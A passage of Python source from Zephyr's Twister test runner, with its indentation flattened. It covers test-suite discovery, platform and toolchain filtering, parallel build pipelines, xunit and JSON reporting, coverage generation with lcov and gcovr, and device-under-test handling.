result = CMake.run_cmake_script([toolchain_script, "FORMAT=json"])
try:
if result['returncode']:
raise TwisterRuntimeError(f"E: {result['returnmsg']}")
except Exception as e:
print(str(e))
sys.exit(2)
toolchain = json.loads(result['stdout'])['ZEPHYR_TOOLCHAIN_VARIANT']
logger.info(f"Using '{toolchain}' toolchain.")
return toolchain
def add_testsuites(self, testsuite_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, _, filenames in os.walk(root, topdown=True):
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTSUITE_FILENAME in filenames:
filename = self.TESTSUITE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
ts_path = os.path.join(dirpath, filename)
try:
parsed_data = TwisterConfigParser(ts_path, self.ts_schema)
parsed_data.load()
ts_path = os.path.dirname(ts_path)
workdir = os.path.relpath(ts_path, root)
for name in parsed_data.tests.keys():
ts = TestSuite(root, workdir, name)
ts_dict = parsed_data.get_test(name, self.testsuite_valid_keys)
ts.source_dir = ts_path
ts.yamlfile = ts_path
ts.type = ts_dict["type"]
ts.tags = ts_dict["tags"]
ts.extra_args = ts_dict["extra_args"]
ts.extra_configs = ts_dict["extra_configs"]
ts.arch_allow = ts_dict["arch_allow"]
ts.arch_exclude = ts_dict["arch_exclude"]
ts.skip = ts_dict["skip"]
ts.platform_exclude = ts_dict["platform_exclude"]
ts.platform_allow = ts_dict["platform_allow"]
ts.platform_type = ts_dict["platform_type"]
ts.toolchain_exclude = ts_dict["toolchain_exclude"]
ts.toolchain_allow = ts_dict["toolchain_allow"]
ts.ts_filter = ts_dict["filter"]
ts.timeout = ts_dict["timeout"]
ts.harness = ts_dict["harness"]
ts.harness_config = ts_dict["harness_config"]
if ts.harness == 'console' and not ts.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
ts.build_only = ts_dict["build_only"]
ts.build_on_all = ts_dict["build_on_all"]
ts.slow = ts_dict["slow"]
ts.min_ram = ts_dict["min_ram"]
ts.modules = ts_dict["modules"]
ts.depends_on = ts_dict["depends_on"]
ts.min_flash = ts_dict["min_flash"]
ts.extra_sections = ts_dict["extra_sections"]
ts.integration_platforms = ts_dict["integration_platforms"]
ts.seed = ts_dict["seed"]
testcases = ts_dict.get("testcases", [])
if testcases:
for tc in testcases:
ts.add_testcase(name=f"{name}.{tc}")
else:
ts.parse_subcases(ts_path)
if testsuite_filter:
if ts.name and ts.name in testsuite_filter:
self.testsuites[ts.name] = ts
else:
self.testsuites[ts.name] = ts
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (ts_path, e))
self.load_errors += 1
return len(self.testsuites)
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_quarantine(self, file):
"""
Loads quarantine list from the given yaml file. Creates a dictionary
of all tests configurations (platform + scenario: comment) that shall be
skipped due to quarantine
"""
# Load yaml into quarantine_yaml
quarantine_yaml = scl.yaml_load_verify(file, self.quarantine_schema)
# Create quarantine_list with a product of the listed
# platforms and scenarios for each entry in quarantine yaml
quarantine_list = []
for quar_dict in quarantine_yaml:
if quar_dict['platforms'][0] == "all":
plat = self.platform_names
else:
plat = quar_dict['platforms']
comment = quar_dict.get('comment', "NA")
quarantine_list.append([{".".join([p, s]): comment}
for p in plat for s in quar_dict['scenarios']])
# Flatten the quarantine_list
quarantine_list = [it for sublist in quarantine_list for it in sublist]
# Change quarantine_list into a dictionary
for d in quarantine_list:
self.quarantine.update(d)
def load_from_file(self, file, filter_platform=[]):
with open(file, "r") as json_test_plan:
jtp = json.load(json_test_plan)
instance_list = []
for ts in jtp.get("testsuites", []):
logger.debug(f"loading {ts['name']}...")
testsuite = ts["name"]
platform = self.get_platform(ts["platform"])
if filter_platform and platform.name not in filter_platform:
continue
instance = TestInstance(self.testsuites[testsuite], platform, self.outdir)
if ts.get("run_id"):
instance.run_id = ts.get("run_id")
if self.device_testing:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
instance.metrics['handler_time'] = ts.get('execution_time', 0)
instance.metrics['ram_size'] = ts.get("ram_size", 0)
instance.metrics['rom_size'] = ts.get("rom_size",0)
status = ts.get('status', None)
reason = ts.get("reason", "Unknown")
if status in ["error", "failed"]:
instance.status = None
instance.reason = None
# test marked as passed (built only) but can run when
# --test-only is used. Reset status to capture new results.
elif status == 'passed' and instance.run and self.test_only:
instance.status = None
instance.reason = None
else:
instance.status = status
instance.reason = reason
for tc in ts.get('testcases', []):
identifier = tc['identifier']
tc_status = tc.get('status', None)
tc_reason = None
# we set reason only if status is valid, it might have been
# reset above...
if instance.status:
tc_reason = tc.get('reason')
if tc_status:
case = instance.set_case_status_by_name(identifier, tc_status, tc_reason)
case.duration = tc.get('execution_time', 0)
if tc.get('log'):
case.output = tc.get('log')
instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testsuite_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
runnable = kwargs.get('runnable')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
emu_filter = kwargs.get('emulation_only')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
emulation_platforms = False
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all used, any --platform arguments ignored
platform_filter = []
elif not platform_filter and not emu_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
elif emu_filter:
logger.info("Selecting emulation platforms per test case")
emulation_platforms = True
if platform_filter:
self.verify_platforms_existence(platform_filter, f"platform_filter")
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
elif emu_filter:
platforms = list(filter(lambda p: p.simulation != 'na', self.platforms))
elif arch_filter:
platforms = list(filter(lambda p: p.arch in arch_filter, self.platforms))
elif default_platforms:
platforms = list(filter(lambda p: p.default, self.platforms))
else:
platforms = self.platforms
logger.info("Building initial testsuite list...")
for ts_name, ts in self.testsuites.items():
if ts.build_on_all and not platform_filter:
platform_scope = self.platforms
elif ts.integration_platforms and self.integration:
self.verify_platforms_existence(
ts.integration_platforms, f"{ts_name} - integration_platforms")
platform_scope = list(filter(lambda item: item.name in ts.integration_platforms, \
self.platforms))
else:
platform_scope = platforms
integration = self.integration and ts.integration_platforms
# If there isn't any overlap between the platform_allow list and the platform_scope
# we set the scope to the platform_allow list
if ts.platform_allow and not platform_filter and not integration:
self.verify_platforms_existence(
ts.platform_allow, f"{ts_name} - platform_allow")
a = set(platform_scope)
b = set(filter(lambda item: item.name in ts.platform_allow, self.platforms))
c = a.intersection(b)
if not c:
platform_scope = list(filter(lambda item: item.name in ts.platform_allow, \
self.platforms))
# list of instances per testsuite, aka configurations.
instance_list = []
for plat in platform_scope:
instance = TestInstance(ts, plat, self.outdir)
if runnable:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
if runnable and self.duts:
for h in self.duts:
if h.platform == plat.name:
if ts.harness_config.get('fixture') in h.fixtures:
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = discards.get(instance, "Platform is excluded on command line.")
if (plat.arch == "unit") != (ts.type == "unit"):
# Discard silently
continue
if ts.modules and self.modules:
if not set(ts.modules).issubset(set(self.modules)):
discards[instance] = discards.get(instance, f"one or more required module not available: {','.join(ts.modules)}")
if runnable and not instance.run:
discards[instance] = discards.get(instance, "Not runnable on device")
if self.integration and ts.integration_platforms and plat.name not in ts.integration_platforms:
discards[instance] = discards.get(instance, "Not part of integration platforms")
if ts.skip:
discards[instance] = discards.get(instance, "Skip filter")
if tag_filter and not ts.tags.intersection(tag_filter):
discards[instance] = discards.get(instance, "Command line testsuite tag filter")
if exclude_tag and ts.tags.intersection(exclude_tag):
discards[instance] = discards.get(instance, "Command line testsuite exclude filter")
if testsuite_filter and ts_name not in testsuite_filter:
discards[instance] = discards.get(instance, "TestSuite name filter")
if arch_filter and plat.arch not in arch_filter:
discards[instance] = discards.get(instance, "Command line testsuite arch filter")
if not force_platform:
if ts.arch_allow and plat.arch not in ts.arch_allow:
discards[instance] = discards.get(instance, "Not in test case arch allow list")
if ts.arch_exclude and plat.arch in ts.arch_exclude:
discards[instance] = discards.get(instance, "In test case arch exclude")
if ts.platform_exclude and plat.name in ts.platform_exclude:
discards[instance] = discards.get(instance, "In test case platform exclude")
if ts.toolchain_exclude and toolchain in ts.toolchain_exclude:
discards[instance] = discards.get(instance, "In test case toolchain exclude")
if platform_filter and plat.name not in platform_filter:
discards[instance] = discards.get(instance, "Command line platform filter")
if ts.platform_allow and plat.name not in ts.platform_allow:
discards[instance] = discards.get(instance, "Not in testsuite platform allow list")
if ts.platform_type and plat.type not in ts.platform_type:
discards[instance] = discards.get(instance, "Not in testsuite platform type list")
if ts.toolchain_allow and toolchain not in ts.toolchain_allow:
discards[instance] = discards.get(instance, "Not in testsuite toolchain allow list")
if not plat.env_satisfied:
discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env)))
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and "host" not in plat.supported_toolchains \
and ts.type != 'unit':
discards[instance] = discards.get(instance, "Not supported by the toolchain")
if plat.ram < ts.min_ram:
discards[instance] = discards.get(instance, "Not enough RAM")
if ts.depends_on:
dep_intersection = ts.depends_on.intersection(set(plat.supported))
if dep_intersection != set(ts.depends_on):
discards[instance] = discards.get(instance, "No hardware support")
if plat.flash < ts.min_flash:
discards[instance] = discards.get(instance, "Not enough FLASH")
if set(plat.ignore_tags) & ts.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)")
if plat.only_tags and not set(plat.only_tags) & ts.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)")
test_configuration = ".".join([instance.platform.name,
instance.testsuite.id])
# skip quarantined tests
if test_configuration in self.quarantine and not self.quarantine_verify:
discards[instance] = discards.get(instance,
f"Quarantine: {self.quarantine[test_configuration]}")
# run only quarantined test to verify their statuses (skip everything else)
if self.quarantine_verify and test_configuration not in self.quarantine:
discards[instance] = discards.get(instance, "Not under quarantine")
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testsuite
if not instance_list:
continue
# if twister was launched with no platform options at all, we
# take all default platforms
if default_platforms and not ts.build_on_all and not integration:
if ts.platform_allow:
a = set(self.default_platforms)
b = set(ts.platform_allow)
c = a.intersection(b)
if c:
aa = list(filter(lambda ts: ts.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list)
else:
instances = list(filter(lambda ts: ts.platform.default, instance_list))
self.add_instances(instances)
elif integration:
instances = list(filter(lambda item: item.platform.name in ts.integration_platforms, instance_list))
self.add_instances(instances)
elif emulation_platforms:
self.add_instances(instance_list)
for instance in list(filter(lambda inst: not inst.platform.simulation != 'na', instance_list)):
discards[instance] = discards.get(instance, "Not an emulated platform")
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
remove_from_discards = [] # configurations to be removed from discards.
for instance in self.discards:
instance.reason = self.discards[instance]
# If integration mode is on all skips on integration_platforms are treated as errors.
if self.integration and instance.platform.name in instance.testsuite.integration_platforms \
and "Quarantine" not in instance.reason:
instance.status = "error"
instance.reason += " but is one of the integration platforms"
self.instances[instance.name] = instance
# Such configuration has to be removed from discards to make sure it won't get skipped
remove_from_discards.append(instance)
else:
instance.status = "filtered"
instance.add_missing_testscases(instance.status)
# Remove from discards configurations that must not be discarded
# (e.g. integration_platforms when --integration was used)
for instance in remove_from_discards:
del self.discards[instance]
self.filtered_platforms = set(p.platform.name for p in self.instances.values()
if p.status != "skipped" )
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, pipeline, build_only=False, test_only=False, retry_build_errors=False):
for instance in self.instances.values():
if build_only:
instance.run = False
no_retry_statuses = ['passed', 'skipped', 'filtered']
if not retry_build_errors:
no_retry_statuses.append("error")
if instance.status not in no_retry_statuses:
logger.debug(f"adding {instance.name}")
instance.status = None
if test_only and instance.run:
pipeline.put({"op": "run", "test": instance})
else:
pipeline.put({"op": "cmake", "test": instance})
def pipeline_mgr(self, pipeline, done_queue, lock, results):
while True:
try:
task = pipeline.get_nowait()
except queue.Empty:
break
else:
test = task['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
ubsan=self.enable_ubsan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose,
warnings_as_errors=self.warnings_as_errors,
overflow_as_errors=self.overflow_as_errors,
suite_name_check=self.suite_name_check,
seed=self.seed
)
pb.process(pipeline, done_queue, task, lock, results)
return True
def execute(self, pipeline, done, results):
lock = Lock()
logger.info("Adding tasks to the queue...")
self.add_tasks_to_queue(pipeline, self.build_only, self.test_only,
retry_build_errors=self.retry_build_errors)
logger.info("Added initial list of jobs to queue")
processes = []
for job in range(self.jobs):
logger.debug(f"Launch process {job}")
p = Process(target=self.pipeline_mgr, args=(pipeline, done, lock, results, ))
processes.append(p)
p.start()
try:
for p in processes:
p.join()
except KeyboardInterrupt:
logger.info("Execution interrupted")
for p in processes:
p.terminate()
return results
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
@staticmethod
def xunit_testcase(eleTestsuite, name, classname, status, ts_status, reason, duration, runnable, stats, log, build_only_as_skip):
fails, passes, errors, skips = stats
if status in ['skipped', 'filtered']:
duration = 0
eleTestcase = ET.SubElement(
eleTestsuite, "testcase",
classname=classname,
name=f"{name}",
time=f"{duration}")
if status in ['skipped', 'filtered']:
skips += 1
# temporarily add build_only_as_skip to restore existing CI report behaviour
if ts_status == "passed" and not runnable:
tc_type = "build"
else:
tc_type = status
ET.SubElement(eleTestcase, 'skipped', type=f"{tc_type}", message=f"{reason}")
elif status in ["failed", "blocked"]:
fails += 1
el = ET.SubElement(eleTestcase, 'failure', type="failure", message=f"{reason}")
if log:
el.text = log
elif status == "error":
errors += 1
el = ET.SubElement(eleTestcase, 'error', type="failure", message=f"{reason}")
if log:
el.text = log
elif status == 'passed':
if not runnable and build_only_as_skip:
ET.SubElement(eleTestcase, 'skipped', type="build", message="built only")
skips += 1
else:
passes += 1
else:
if not status:
logger.debug(f"{name}: No status")
ET.SubElement(eleTestcase, 'skipped', type=f"untested", message="No results captured, testsuite misconfiguration?")
else:
logger.error(f"{name}: Unknown status '{status}'")
return (fails, passes, errors, skips)
# Generate a report with all testsuites instead of doing this per platform
def xunit_report_suites(self, json_file, filename):
json_data = {}
with open(json_file, "r") as json_results:
json_data = json.load(json_results)
env = json_data.get('environment', {})
version = env.get('zephyr_version', None)
eleTestsuites = ET.Element('testsuites')
all_suites = json_data.get("testsuites", [])
suites_to_report = all_suites
# do not create entry if everything is filtered out
if not self.detailed_skipped_report:
suites_to_report = list(filter(lambda d: d.get('status') != "filtered", all_suites))
for suite in suites_to_report:
duration = 0
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=suite.get("name"), time="0",
timestamp = self.timestamp,
tests="0",
failures="0",
errors="0", skipped="0")
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
ET.SubElement(eleTSPropetries, 'property', name="platform", value=suite.get("platform"))
ET.SubElement(eleTSPropetries, 'property', name="architecture", value=suite.get("arch"))
total = 0
fails = passes = errors = skips = 0
handler_time = suite.get('execution_time', 0)
runnable = suite.get('runnable', 0)
duration += float(handler_time)
ts_status = suite.get('status')
for tc in suite.get("testcases", []):
status = tc.get('status')
reason = tc.get('reason', suite.get('reason', 'Unknown'))
log = tc.get("log", suite.get("log"))
tc_duration = tc.get('execution_time', handler_time)
name = tc.get("identifier")
classname = ".".join(name.split(".")[:2])
fails, passes, errors, skips = self.xunit_testcase(eleTestsuite,
name, classname, status, ts_status, reason, tc_duration, runnable,
(fails, passes, errors, skips), log, True)
total = (errors + passes + fails + skips)
eleTestsuite.attrib['time'] = f"{duration}"
eleTestsuite.attrib['failures'] = f"{fails}"
eleTestsuite.attrib['errors'] = f"{errors}"
eleTestsuite.attrib['skipped'] = f"{skips}"
eleTestsuite.attrib['tests'] = f"{total}"
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
def xunit_report(self, json_file, filename, selected_platform=None, full_report=False):
if selected_platform:
selected = [selected_platform]
logger.info(f"Writing target report for {selected_platform}...")
else:
logger.info(f"Writing xunit report {filename}...")
selected = self.selected_platforms
json_data = {}
with open(json_file, "r") as json_results:
json_data = json.load(json_results)
env = json_data.get('environment', {})
version = env.get('zephyr_version', None)
eleTestsuites = ET.Element('testsuites')
all_suites = json_data.get("testsuites", [])
for platform in selected:
suites = list(filter(lambda d: d['platform'] == platform, all_suites))
# do not create entry if everything is filtered out
if not self.detailed_skipped_report:
non_filtered = list(filter(lambda d: d.get('status') != "filtered", suites))
if not non_filtered:
continue
duration = 0
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=platform,
timestamp = self.timestamp,
time="0",
tests="0",
failures="0",
errors="0", skipped="0")
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
total = 0
fails = passes = errors = skips = 0
for ts in suites:
handler_time = ts.get('execution_time', 0)
runnable = ts.get('runnable', 0)
duration += float(handler_time)
ts_status = ts.get('status')
# Do not report filtered testcases
if ts_status == 'filtered' and not self.detailed_skipped_report:
continue
if full_report:
for tc in ts.get("testcases", []):
status = tc.get('status')
reason = tc.get('reason', ts.get('reason', 'Unknown'))
log = tc.get("log", ts.get("log"))
tc_duration = tc.get('execution_time', handler_time)
name = tc.get("identifier")
classname = ".".join(name.split(".")[:2])
fails, passes, errors, skips = self.xunit_testcase(eleTestsuite,
name, classname, status, ts_status, reason, tc_duration, runnable,
(fails, passes, errors, skips), log, True)
else:
reason = ts.get('reason', 'Unknown')
name = ts.get("name")
classname = f"{platform}:{name}"
log = ts.get("log")
fails, passes, errors, skips = self.xunit_testcase(eleTestsuite,
name, classname, ts_status, ts_status, reason, duration, runnable,
(fails, passes, errors, skips), log, False)
total = (errors + passes + fails + skips)
eleTestsuite.attrib['time'] = f"{duration}"
eleTestsuite.attrib['failures'] = f"{fails}"
eleTestsuite.attrib['errors'] = f"{errors}"
eleTestsuite.attrib['skipped'] = f"{skips}"
eleTestsuite.attrib['tests'] = f"{total}"
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
def json_report(self, filename, version="NA"):
logger.info(f"Writing JSON report {filename}")
report = {}
report["environment"] = {"os": os.name,
"zephyr_version": version,
"toolchain": self.get_toolchain()
}
suites = []
for instance in self.instances.values():
suite = {}
handler_log = os.path.join(instance.build_dir, "handler.log")
build_log = os.path.join(instance.build_dir, "build.log")
device_log = os.path.join(instance.build_dir, "device.log")
handler_time = instance.metrics.get('handler_time', 0)
ram_size = instance.metrics.get ("ram_size", 0)
rom_size = instance.metrics.get("rom_size",0)
suite = {
"name": instance.testsuite.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
}
if instance.run_id:
suite['run_id'] = instance.run_id
suite["runnable"] = False
if instance.status != 'filtered':
suite["runnable"] = instance.run
if ram_size:
suite["ram_size"] = ram_size
if rom_size:
suite["rom_size"] = rom_size
if instance.status in ["error", "failed"]:
suite['status'] = instance.status
suite["reason"] = instance.reason
# FIXME
if os.path.exists(handler_log):
suite["log"] = self.process_log(handler_log)
elif os.path.exists(device_log):
suite["log"] = self.process_log(device_log)
else:
suite["log"] = self.process_log(build_log)
elif instance.status == 'filtered':
suite["status"] = "filtered"
suite["reason"] = instance.reason
elif instance.status == 'passed':
suite["status"] = "passed"
elif instance.status == 'skipped':
suite["status"] = "skipped"
suite["reason"] = instance.reason
if instance.status is not None:
suite["execution_time"] = f"{float(handler_time):.2f}"
testcases = []
if len(instance.testcases) == 1:
single_case_duration = f"{float(handler_time):.2f}"
else:
single_case_duration = 0
for case in instance.testcases:
testcase = {}
testcase['identifier'] = case.name
if instance.status:
if single_case_duration:
testcase['execution_time'] = single_case_duration
else:
testcase['execution_time'] = f"{float(case.duration):.2f}"
if case.output != "":
testcase['log'] = case.output
if case.status == "skipped":
if instance.status == "filtered":
testcase["status"] = "filtered"
else:
testcase["status"] = "skipped"
testcase["reason"] = case.reason or instance.reason
else:
testcase["status"] = case.status
if case.reason:
testcase["reason"] = case.reason
testcases.append(testcase)
suite['testcases'] = testcases
suites.append(suite)
report["testsuites"] = suites
with open(filename, "wt") as json_file:
json.dump(report, json_file, indent=4, separators=(',',':'))
def get_testsuite(self, identifier):
results = []
for _, ts in self.testsuites.items():
for case in ts.testcases:
if case == identifier:
results.append(ts)
return results
def verify_platforms_existence(self, platform_names_to_verify, log_info=""):
"""
Verify if platform name (passed by --platform option, or in yaml file
as platform_allow or integration_platforms options) is correct. If not -
log and raise error.
"""
for platform in platform_names_to_verify:
if platform in self.platform_names:
break
else:
logger.error(f"{log_info} - unrecognized platform - {platform}")
sys.exit(2)
def create_build_dir_links(self):
"""
Iterate through all no-skipped instances in suite and create links
for each one build directories. Those links will be passed in the next
steps to the CMake command.
"""
links_dir_name = "twister_links" # folder for all links
links_dir_path = os.path.join(self.outdir, links_dir_name)
if not os.path.exists(links_dir_path):
os.mkdir(links_dir_path)
for instance in self.instances.values():
if instance.status != "skipped":
self._create_build_dir_link(links_dir_path, instance)
def _create_build_dir_link(self, links_dir_path, instance):
"""
Create build directory with original "long" path. Next take shorter
path and link them with original path - create link. At the end
replace build_dir to created link. This link will be passed to CMake
command. This action helps to limit path length which can be
significant during building by CMake on Windows OS.
"""
os.makedirs(instance.build_dir, exist_ok=True)
link_name = f"test_{self.link_dir_counter}"
link_path = os.path.join(links_dir_path, link_name)
if os.name == "nt": # if OS is Windows
command = ["mklink", "/J", f"{link_path}", f"{instance.build_dir}"]
subprocess.call(command, shell=True)
else: # for Linux and MAC OS
os.symlink(instance.build_dir, link_path)
# Here original build directory is replaced with symbolic link. It will
# be passed to CMake command
instance.build_dir = link_path
self.link_dir_counter += 1
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
logger.debug(f"Select {tool} as the coverage tool...")
return t
@staticmethod
def retrieve_gcov_data(input_file):
logger.debug("Working on %s" % input_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(input_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
# if kobject_hash is given for coverage gcovr fails
# hence skipping it problem only in gcovr v4.1
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append('*/' + pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
cmd = ["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(".*/" + pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
cmd = ["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes + ["--json", "-o",
coveragefile, outdir]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class DUT(object):
def __init__(self,
id=None,
serial=None,
serial_baud=None,
platform=None,
product=None,
serial_pty=None,
connected=False,
runner_params=None,
pre_script=None,
post_script=None,
post_flash_script=None,
runner=None):
self.serial = serial
self.baud = serial_baud or 115200
self.platform = platform
self.serial_pty = serial_pty
self._counter = Value("i", 0)
self._available = Value("i", 1)
self.connected = connected
self.pre_script = pre_script
self.id = id
self.product = product
self.runner = runner
self.runner_params = runner_params
self.fixtures = []
self.post_flash_script = post_flash_script
self.post_script = post_script
self.pre_script = pre_script
self.probe_id = None
self.notes = None
self.lock = Lock()
self.match = False
@property
def available(self):
with self._available.get_lock():
return self._available.value
@available.setter
def available(self, value):
with self._available.get_lock():
self._available.value = value
@property
def counter(self):
with self._counter.get_lock():
return self._counter.value
@counter.setter
def counter(self, value):
with self._counter.get_lock():
self._counter.value = value
def to_dict(self):
d = {}
exclude = ['_available', '_counter', 'match']
v = vars(self)
for k in v.keys():
if k not in exclude and v[k]:
d[k] = v[k]
return d
def __repr__(self):
return f"<{self.platform} ({self.product}) on {self.serial}>"
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "schemas", "twister", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
